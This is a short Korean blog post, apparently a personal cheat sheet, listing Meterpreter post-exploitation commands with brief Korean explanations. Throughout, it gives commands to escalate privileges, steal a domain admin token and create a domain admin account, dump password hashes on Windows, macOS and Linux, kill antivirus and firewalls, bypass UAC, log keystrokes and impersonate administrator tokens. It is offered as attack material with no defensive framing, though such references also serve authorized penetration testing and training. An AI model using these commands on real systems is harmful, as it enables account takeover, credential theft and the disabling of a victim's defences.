ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • post exploit
    카테고리 없음 2020. 2. 29. 08:02

     미터프리터(meterpreter) 포스트 익스플로잇(post exploit) 명령

     

    미터프리터를 사용하여 윈도우 기반 시스템의 권한을 상승한다.meterpreter> use privmeterpreter> getsystem

     

    주어진 프로세스 ID에서 도메인 관리자 토큰을 훔쳐 도메인 계정을 추가하고 해당 계정을 도메인 관리 그룹으로 지정한다.

    meterpreter> psmeterpreter> steal_token 1784meterpreter> shellc:\windows\system32> net user metasploit p@55w0rd

    /ADD /DOMAINc:\windows\system32> net group "Domain Admin" metasploit /ADD /DOMAIN

     

    SAM 데이터베이스에서 패스워드 해시를 덤프한다.

    (주의)만약 windows 2008 서버에서 getsystem, hashdump 명령어 예외가

    발생한다면 system 계정에서 동작하는 프로세스로 이주할 필요가 있다.

    meterpreter> use privmeterpreter> getsystemmeterpreter> hashdump

     

    다른 프로세스로 자동 이주한다.meterpreter> run migrate

     

    killav 미터프리터 스크립트 대상에서 동작하는 백신을 종료한다.meterpreter> run killav

     

    이주한 프로세스 내에 대상 시스템 키보드 입력을 수집한다.

    meterpreter> psmeterpreter> migrate 1436meterpreter> keyscan_startmeterpreter> keyscan_dumpmeterpreter> keyscan_stop

     

    관리자로 가장하기 위해 익명을 사용한다.

    meterpreter> use incognitometerpreter> list_tokens -umeterpreter> use privmeterpreter> getsystemmeterpreter>

    list_tokens -umeterpreter> impersonate_token IHAZSECURITY\\Administrator

     

    점령한 대상에 존재하는 보호 메커니즘을 파악하고, 명령과 관련된 도움말을 출력하며, 방화벽 같은 모든 발견된 대응책을 종료한다.

    meterpreter> run getcountermeasuremeterpreter> run getcountermeasure -hmeterpreter> run getcountermeasure -d -k

     

    점령한 시스템이 가상 머신인지 확인한다.meterpreter> run checkvm

     

    현재 미터프리터 콘솔 세션에서 명령 창을 띄운다.meterpreter> shell

     

    대상 머신에서 원격 GUI 프로그램(EX: VNC)을 실행한다.meterpreter> run vnc

     

    현재 동작하는 미터프리터 콘솔을 백그라운드로 전환한다.meterpreter> background

     

    윈도우의 사용자 접근 제어(UAC, User Access Control)를 우회한다.meterpreter> run post/windows/escalate/bypassuac

     

    OS X 시스템의 해시를 추출한다.meterpreter> run post/osx/gather/hashdump

     

    리눅스 시스템의 해시를 추출한다.meterpreter> run post/linux/gather/hashdump

     

     

Designed by Tistory.